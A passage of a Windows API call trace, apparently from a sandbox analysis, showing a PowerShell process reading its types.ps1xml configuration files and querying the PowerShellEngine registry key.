	[0039.382] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x25e58c | out: lpFileInformation=0x25e58c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0058e2, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0058e2, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd7bbaefc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0039.382] GetLastError () returned 0xcb
	[0039.382] SetErrorMode (uMode=0x1) returned 0x1
	[0039.386] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x25e10c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0039.386] GetLastError () returned 0xcb
	[0039.386] SetErrorMode (uMode=0x1) returned 0x1
	[0039.387] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x25e58c | out: lpFileInformation=0x25e58c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7c2d31c, ftCreationTime.dwHighDateTime=0x1c9ea11, ftLastAccessTime.dwLowDateTime=0xd7c2d31c, ftLastAccessTime.dwHighDateTime=0x1c9ea11, ftLastWriteTime.dwLowDateTime=0xd7c5347c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0039.387] GetLastError () returned 0xcb
	[0039.387] SetErrorMode (uMode=0x1) returned 0x1
	[0039.392] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0039.392] GetLastError () returned 0xcb
	[0039.394] GetACP () returned 0x4e4
	[0039.405] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x25df9c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0039.405] GetLastError () returned 0x0
	[0039.405] SetErrorMode (uMode=0x1) returned 0x1
	[0039.408] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x334
	[0039.408] GetLastError () returned 0x0
	[0039.409] GetFileType (hFile=0x334) returned 0x1
	[0039.409] SetErrorMode (uMode=0x1) returned 0x1
	[0039.409] GetFileType (hFile=0x334) returned 0x1
	[0039.410] ReadFile (in: hFile=0x334, lpBuffer=0x20afbf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e504, lpOverlapped=0x0 | out: lpBuffer=0x20afbf8*, lpNumberOfBytesRead=0x25e504*=0x1000, lpOverlapped=0x0) returned 1
	[0039.412] GetLastError () returned 0x0
	[0039.413] ReadFile (in: hFile=0x334, lpBuffer=0x20afbf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e504, lpOverlapped=0x0 | out: lpBuffer=0x20afbf8*, lpNumberOfBytesRead=0x25e504*=0x1000, lpOverlapped=0x0) returned 1
	[0039.413] GetLastError () returned 0x0
	[0039.413] ReadFile (in: hFile=0x334, lpBuffer=0x20afbf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e504, lpOverlapped=0x0 | out: lpBuffer=0x20afbf8*, lpNumberOfBytesRead=0x25e504*=0x1000, lpOverlapped=0x0) returned 1
	[0039.413] GetLastError () returned 0x0
	[0039.414] ReadFile (in: hFile=0x334, lpBuffer=0x20afbf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e504, lpOverlapped=0x0 | out: lpBuffer=0x20afbf8*, lpNumberOfBytesRead=0x25e504*=0xcf3, lpOverlapped=0x0) returned 1
	[0039.414] GetLastError () returned 0x0
	[0039.414] ReadFile (in: hFile=0x334, lpBuffer=0x20af08b, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x25e504, lpOverlapped=0x0 | out: lpBuffer=0x20af08b*, lpNumberOfBytesRead=0x25e504*=0x0, lpOverlapped=0x0) returned 1
	[0039.414] GetLastError () returned 0x0
	[0039.414] ReadFile (in: hFile=0x334, lpBuffer=0x20afbf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e504, lpOverlapped=0x0 | out: lpBuffer=0x20afbf8*, lpNumberOfBytesRead=0x25e504*=0x0, lpOverlapped=0x0) returned 1
	[0039.414] GetLastError () returned 0x0
	[0039.414] CloseHandle (hObject=0x334) returned 1
	[0039.414] GetLastError () returned 0x0
	[0039.415] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x25e064, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0039.415] GetLastError () returned 0x0
	[0039.415] SetErrorMode (uMode=0x1) returned 0x1
	[0039.415] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x20c0f6c | out: lpFileInformation=0x20c0f6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0058e2, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0058e2, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd7bbaefc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0039.415] GetLastError () returned 0x0
	[0039.415] SetErrorMode (uMode=0x1) returned 0x1
	[0039.415] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x25e030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0039.415] GetLastError () returned 0x0
	[0039.415] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e488 | out: phkResult=0x25e488*=0x334) returned 0x0
	[0039.415] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e4d0, lpData=0x0, lpcbData=0x25e4cc*=0x0 | out: lpType=0x25e4d0*=0x1, lpData=0x0, lpcbData=0x25e4cc*=0x56) returned 0x0
	[0039.415] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e4d0, lpData=0x190b58, lpcbData=0x25e4cc*=0x56 | out: lpType=0x25e4d0*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x25e4cc*=0x56) returned 0x0
	[0039.416] RegCloseKey (hKey=0x334) returned 0x0
	[0039.416] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x25e030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0039.416] GetLastError () returned 0x0
	[0039.416] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x25dfc4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0039.416] GetLastError () returned 0x0
	[0039.464] GetSystemInfo (in: lpSystemInfo=0x25dc08 | out: lpSystemInfo=0x25dc08*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x4f01)) 
	[0039.465] VirtualQuery (in: lpAddress=0x25d3c4, lpBuffer=0x25e3c4, dwLength=0x1c | out: lpBuffer=0x25e3c4*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0039.476] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x25df9c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0039.476] GetLastError () returned 0x0
	[0039.476] SetErrorMode (uMode=0x1) returned 0x1
	[0039.476] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x334
	[0039.477] GetLastError () returned 0x0
	[0039.477] GetFileType (hFile=0x334) returned 0x1
	[0039.477] SetErrorMode (uMode=0x1) returned 0x1
	[0039.477] GetFileType (hFile=0x334) returned 0x1
	[0039.477] ReadFile (in: hFile=0x334, lpBuffer=0x20f5388, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e504, lpOverlapped=0x0 | out: lpBuffer=0x20f5388*, lpNumberOfBytesRead=0x25e504*=0x1000, lpOverlapped=0x0) returned 1
	[0039.479] GetLastError () returned 0x0
	[0039.479] ReadFile (in: hFile=0x334, lpBuffer=0x20f5388, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e504, lpOverlapped=0x0 | out: lpBuffer=0x20f5388*, lpNumberOfBytesRead=0x25e504*=0x1000, lpOverlapped=0x0) returned 1
	[0039.479] GetLastError () returned 0x0
	[0039.479] ReadFile (in: hFile=0x334, lpBuffer=0x20f5388, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e504, lpOverlapped=0x0 | out: lpBuffer=0x20f5388*, lpNumberOfBytesRead=0x25e504*=0x1000, lpOverlapped=0x0) returned 1
	[0039.479] GetLastError () returned 0x0
	[0039.480] ReadFile (in: hFile=0x334, lpBuffer=0x20f5388, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e504, lpOverlapped=0x0 | out: lpBuffer=0x20f5388*, lpNumberOfBytesRead=0x25e504*=0x1000, lpOverlapped=0x0) returned 1
	[0039.480] GetLastError () returned 0x0
	[0039.480] ReadFile (in: hFile=0x334, lpBuffer=0x20f5388, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e504, lpOverlapped=0x0 | out: lpBuffer=0x20f5388*, lpNumberOfBytesRead=0x25e504*=0x1000, lpOverlapped=0x0) returned 1
	[0039.480] GetLastError () returned 0x0
	[0039.482] ReadFile (in: hFile=0x334, lpBuffer=0x20f5388, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e504, lpOverlapped=0x0 | out: lpBuffer=0x20f5388*, lpNumberOfBytesRead=0x25e504*=0x1000, lpOverlapped=0x0) returned 1
	[0039.482] GetLastError () returned 0x0
	[0039.482] ReadFile (in: hFile=0x334, lpBuffer=0x20f5388, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e504, lpOverlapped=0x0 | out: lpBuffer=0x20f5388*, lpNumberOfBytesRead=0x25e504*=0x1000, lpOverlapped=0x0) returned 1
	[0039.482] GetLastError () returned 0x0
	[0039.482] ReadFile (in: hFile=0x334, lpBuffer=0x20f5388, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e504, lpOverlapped=0x0 | out: lpBuffer=0x20f5388*, lpNumberOfBytesRead=0x25e504*=0x1000, lpOverlapped=0x0) returned 1
	[0039.482] GetLastError () returned 0x0
	[0039.482] ReadFile (in: hFile=0x334, lpBuffer=0x20f5388, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e504, lpOverlapped=0x0 | out: lpBuffer=0x20f5388*, lpNumberOfBytesRead=0x25e504*=0x1000, lpOverlapped=0x0) returned 1
	[0039.483] GetLastError () returned 0x0
	[0039.484] ReadFile (in: hFile=0x334, lpBuffer=0x20f5388, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e504, lpOverlapped=0x0 | out: lpBuffer=0x20f5388*, lpNumberOfBytesRead=0x25e504*=0x1000, lpOverlapped=0x0) returned 1
	[0039.484] GetLastError () returned 0x0
	[0039.485] ReadFile (in: hFile=0x334, lpBuffer=0x20f5388, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e504, lpOverlapped=0x0 | out: lpBuffer=0x20f5388*, lpNumberOfBytesRead=0x25e504*=0x1000, lpOverlapped=0x0) returned 1
	[0039.485] GetLastError () returned 0x0
	[0039.485] ReadFile (in: hFile=0x334, lpBuffer=0x20f5388, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e504, lpOverlapped=0x0 | out: lpBuffer=0x20f5388*, lpNumberOfBytesRead=0x25e504*=0x1000, lpOverlapped=0x0) returned 1
	[0039.485] GetLastError () returned 0x0
	[0039.485] ReadFile (in: hFile=0x334, lpBuffer=0x20f5388, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e504, lpOverlapped=0x0 | out: lpBuffer=0x20f5388*, lpNumberOfBytesRead=0x25e504*=0x1000, lpOverlapped=0x0) returned 1
	[0039.485] GetLastError () returned 0x0
	[0039.485] ReadFile (in: hFile=0x334, lpBuffer=0x20f5388, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e504, lpOverlapped=0x0 | out: lpBuffer=0x20f5388*, lpNumberOfBytesRead=0x25e504*=0x1000, lpOverlapped=0x0) returned 1
	[0039.485] GetLastError () returned 0x0
	[0039.486] ReadFile (in: hFile=0x334, lpBuffer=0x20f5388, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e504, lpOverlapped=0x0 | out: lpBuffer=0x20f5388*, lpNumberOfBytesRead=0x25e504*=0x1000, lpOverlapped=0x0) returned 1
	[0039.486] GetLastError () returned 0x0
	[0039.486] ReadFile (in: hFile=0x334, lpBuffer=0x20f5388, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e504, lpOverlapped=0x0 | out: lpBuffer=0x20f5388*, lpNumberOfBytesRead=0x25e504*=0x1000, lpOverlapped=0x0) returned 1
	[0039.486] GetLastError () returned 0x0
	[0039.486] ReadFile (in: hFile=0x334, lpBuffer=0x20f5388, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e504, lpOverlapped=0x0 | out: lpBuffer=0x20f5388*, lpNumberOfBytesRead=0x25e504*=0x1000, lpOverlapped=0x0) returned 1
	[0039.486] GetLastError () returned 0x0
	[0039.489] ReadFile (in: hFile=0x334, lpBuffer=0x20f5388, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e504, lpOverlapped=0x0 | out: lpBuffer=0x20f5388*, lpNumberOfBytesRead=0x25e504*=0x1000, lpOverlapped=0x0) returned 1
	[0039.489] GetLastError () returned 0x0
	[0039.489] ReadFile (in: hFile=0x334, lpBuffer=0x20f5388, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e504, lpOverlapped=0x0 | out: lpBuffer=0x20f5388*, lpNumberOfBytesRead=0x25e504*=0x1000, lpOverlapped=0x0) returned 1
	[0039.489] GetLastError () returned 0x0
	[0039.490] ReadFile (in: hFile=0x334, lpBuffer=0x20f5388, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e504, lpOverlapped=0x0 | out: lpBuffer=0x20f5388*, lpNumberOfBytesRead=0x25e504*=0x1000, lpOverlapped=0x0) returned 1
	[0039.490] GetLastError () returned 0x0
	[0039.490] ReadFile (in: hFile=0x334, lpBuffer=0x20f5388, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e504, lpOverlapped=0x0 | out: lpBuffer=0x20f5388*, lpNumberOfBytesRead=0x25e504*=0x1000, lpOverlapped=0x0) returned 1
	[0039.490] GetLastError () returned 0x0
	[0039.490] ReadFile (in: hFile=0x334, lpBuffer=0x20f5388, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e504, lpOverlapped=0x0 | out: lpBuffer=0x20f5388*, lpNumberOfBytesRead=0x25e504*=0x1000, lpOverlapped=0x0) returned 1
	[0039.490] GetLastError () returned 0x0
	[0039.490] ReadFile (in: hFile=0x334, lpBuffer=0x20f5388, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e504, lpOverlapped=0x0 | out: lpBuffer=0x20f5388*, lpNumberOfBytesRead=0x25e504*=0x1000, lpOverlapped=0x0) returned 1
	[0039.491] GetLastError () returned 0x0
	[0039.491] ReadFile (in: hFile=0x334, lpBuffer=0x20f5388, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e504, lpOverlapped=0x0 | out: lpBuffer=0x20f5388*, lpNumberOfBytesRead=0x25e504*=0x1000, lpOverlapped=0x0) returned 1
	[0039.491] GetLastError () returned 0x0
	[0039.491] ReadFile (in: hFile=0x334, lpBuffer=0x20f5388, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e504, lpOverlapped=0x0 | out: lpBuffer=0x20f5388*, lpNumberOfBytesRead=0x25e504*=0x1000, lpOverlapped=0x0) returned 1
	[0039.491] GetLastError () returned 0x0
	[0039.491] ReadFile (in: hFile=0x334, lpBuffer=0x20f5388, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e504, lpOverlapped=0x0 | out: lpBuffer=0x20f5388*, lpNumberOfBytesRead=0x25e504*=0x1000, lpOverlapped=0x0) returned 1
	[0039.491] GetLastError () returned 0x0
	[0039.492] ReadFile (in: hFile=0x334, lpBuffer=0x20f5388, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e504, lpOverlapped=0x0 | out: lpBuffer=0x20f5388*, lpNumberOfBytesRead=0x25e504*=0x1000, lpOverlapped=0x0) returned 1
	[0039.492] GetLastError () returned 0x0
	[0039.492] ReadFile (in: hFile=0x334, lpBuffer=0x20f5388, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e504, lpOverlapped=0x0 | out: lpBuffer=0x20f5388*, lpNumberOfBytesRead=0x25e504*=0x1000, lpOverlapped=0x0) returned 1
	[0039.492] GetLastError () returned 0x0
	[0039.492] ReadFile (in: hFile=0x334, lpBuffer=0x20f5388, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e504, lpOverlapped=0x0 | out: lpBuffer=0x20f5388*, lpNumberOfBytesRead=0x25e504*=0x1000, lpOverlapped=0x0) returned 1
	[0039.492] GetLastError () returned 0x0
	[0039.492] ReadFile (in: hFile=0x334, lpBuffer=0x20f5388, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e504, lpOverlapped=0x0 | out: lpBuffer=0x20f5388*, lpNumberOfBytesRead=0x25e504*=0x1000, lpOverlapped=0x0) returned 1
	[0039.492] GetLastError () returned 0x0
	[0039.493] ReadFile (in: hFile=0x334, lpBuffer=0x20f5388, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e504, lpOverlapped=0x0 | out: lpBuffer=0x20f5388*, lpNumberOfBytesRead=0x25e504*=0x1000, lpOverlapped=0x0) returned 1
	[0039.493] GetLastError () returned 0x0
	[0039.493] ReadFile (in: hFile=0x334, lpBuffer=0x20f5388, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e504, lpOverlapped=0x0 | out: lpBuffer=0x20f5388*, lpNumberOfBytesRead=0x25e504*=0x1000, lpOverlapped=0x0) returned 1
	[0039.493] GetLastError () returned 0x0
	[0039.493] ReadFile (in: hFile=0x334, lpBuffer=0x20f5388, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e504, lpOverlapped=0x0 | out: lpBuffer=0x20f5388*, lpNumberOfBytesRead=0x25e504*=0x1000, lpOverlapped=0x0) returned 1
	[0039.493] GetLastError () returned 0x0
	[0039.498] ReadFile (in: hFile=0x334, lpBuffer=0x20f5388, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e504, lpOverlapped=0x0 | out: lpBuffer=0x20f5388*, lpNumberOfBytesRead=0x25e504*=0x1000, lpOverlapped=0x0) returned 1
	[0039.499] GetLastError () returned 0x0
	[0039.499] ReadFile (in: hFile=0x334, lpBuffer=0x20f5388, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e504, lpOverlapped=0x0 | out: lpBuffer=0x20f5388*, lpNumberOfBytesRead=0x25e504*=0x1000, lpOverlapped=0x0) returned 1
	[0039.499] GetLastError () returned 0x0
	[0039.499] ReadFile (in: hFile=0x334, lpBuffer=0x20f5388, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e504, lpOverlapped=0x0 | out: lpBuffer=0x20f5388*, lpNumberOfBytesRead=0x25e504*=0x1000, lpOverlapped=0x0) returned 1
	[0039.499] GetLastError () returned 0x0
	[0039.499] ReadFile (in: hFile=0x334, lpBuffer=0x20f5388, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e504, lpOverlapped=0x0 | out: lpBuffer=0x20f5388*, lpNumberOfBytesRead=0x25e504*=0x1000, lpOverlapped=0x0) returned 1
	[0039.499] GetLastError () returned 0x0
	[0039.500] ReadFile (in: hFile=0x334, lpBuffer=0x20f5388, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e504, lpOverlapped=0x0 | out: lpBuffer=0x20f5388*, lpNumberOfBytesRead=0x25e504*=0x1000, lpOverlapped=0x0) returned 1
	[0039.500] GetLastError () returned 0x0
	[0039.500] ReadFile (in: hFile=0x334, lpBuffer=0x20f5388, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e504, lpOverlapped=0x0 | out: lpBuffer=0x20f5388*, lpNumberOfBytesRead=0x25e504*=0x1000, lpOverlapped=0x0) returned 1
	[0039.500] GetLastError () returned 0x0
	[0039.500] ReadFile (in: hFile=0x334, lpBuffer=0x20f5388, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e504, lpOverlapped=0x0 | out: lpBuffer=0x20f5388*, lpNumberOfBytesRead=0x25e504*=0x1000, lpOverlapped=0x0) returned 1
	[0039.501] GetLastError () returned 0x0
	[0039.501] ReadFile (in: hFile=0x334, lpBuffer=0x20f5388, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e504, lpOverlapped=0x0 | out: lpBuffer=0x20f5388*, lpNumberOfBytesRead=0x25e504*=0x1000, lpOverlapped=0x0) returned 1
	[0039.501] GetLastError () returned 0x0
	[0039.501] ReadFile (in: hFile=0x334, lpBuffer=0x20f5388, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e504, lpOverlapped=0x0 | out: lpBuffer=0x20f5388*, lpNumberOfBytesRead=0x25e504*=0x1b4, lpOverlapped=0x0) returned 1
	[0039.501] GetLastError () returned 0x0
	[0039.501] ReadFile (in: hFile=0x334, lpBuffer=0x20f5388, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e504, lpOverlapped=0x0 | out: lpBuffer=0x20f5388*, lpNumberOfBytesRead=0x25e504*=0x0, lpOverlapped=0x0) returned 1
	[0039.501] GetLastError () returned 0x0
	[0039.501] CloseHandle (hObject=0x334) returned 1
	[0039.502] GetLastError () returned 0x0
	[0039.502] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x25e064, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0039.502] GetLastError () returned 0x0
	[0039.502] SetErrorMode (uMode=0x1) returned 0x1
	[0039.502] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2115c18 | out: lpFileInformation=0x2115c18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7c2d31c, ftCreationTime.dwHighDateTime=0x1c9ea11, ftLastAccessTime.dwLowDateTime=0xd7c2d31c, ftLastAccessTime.dwHighDateTime=0x1c9ea11, ftLastWriteTime.dwLowDateTime=0xd7c5347c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0039.502] GetLastError () returned 0x0
	[0039.502] SetErrorMode (uMode=0x1) returned 0x1
	[0039.502] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x25e030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0039.502] GetLastError () returned 0x0
	[0039.502] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e488 | out: phkResult=0x25e488*=0x334) returned 0x0
	[0039.502] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e4d0, lpData=0x0, lpcbData=0x25e4cc*=0x0 | out: lpType=0x25e4d0*=0x1, lpData=0x0, lpcbData=0x25e4cc*=0x56) returned 0x0
	[0039.503] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e4d0, lpData=0x190b58, lpcbData=0x25e4cc*=0x56 | out: lpType=0x25e4d0*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x25e4cc*=0x56) returned 0x0
	[0039.503] RegCloseKey (hKey=0x334) returned 0x0
	[0039.503] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x25e030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0039.503] GetLastError () returned 0x0
	[0039.503] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x25dfc4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0039.503] GetLastError () returned 0x0
	[0039.615] VirtualQuery (in: lpAddress=0x25d3c4, lpBuffer=0x25e3c4, dwLength=0x1c | out: lpBuffer=0x25e3c4*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0039.639] VirtualQuery (in: lpAddress=0x25d3c4, lpBuffer=0x25e3c4, dwLength=0x1c | out: lpBuffer=0x25e3c4*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0039.641] VirtualQuery (in: lpAddress=0x25d3c4, lpBuffer=0x25e3c4, dwLength=0x1c | out: lpBuffer=0x25e3c4*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0039.641] VirtualQuery (in: lpAddress=0x25d3c4, lpBuffer=0x25e3c4, dwLength=0x1c | out: lpBuffer=0x25e3c4*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0039.642] VirtualQuery (in: lpAddress=0x25d3c4, lpBuffer=0x25e3c4, dwLength=0x1c | out: lpBuffer=0x25e3c4*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
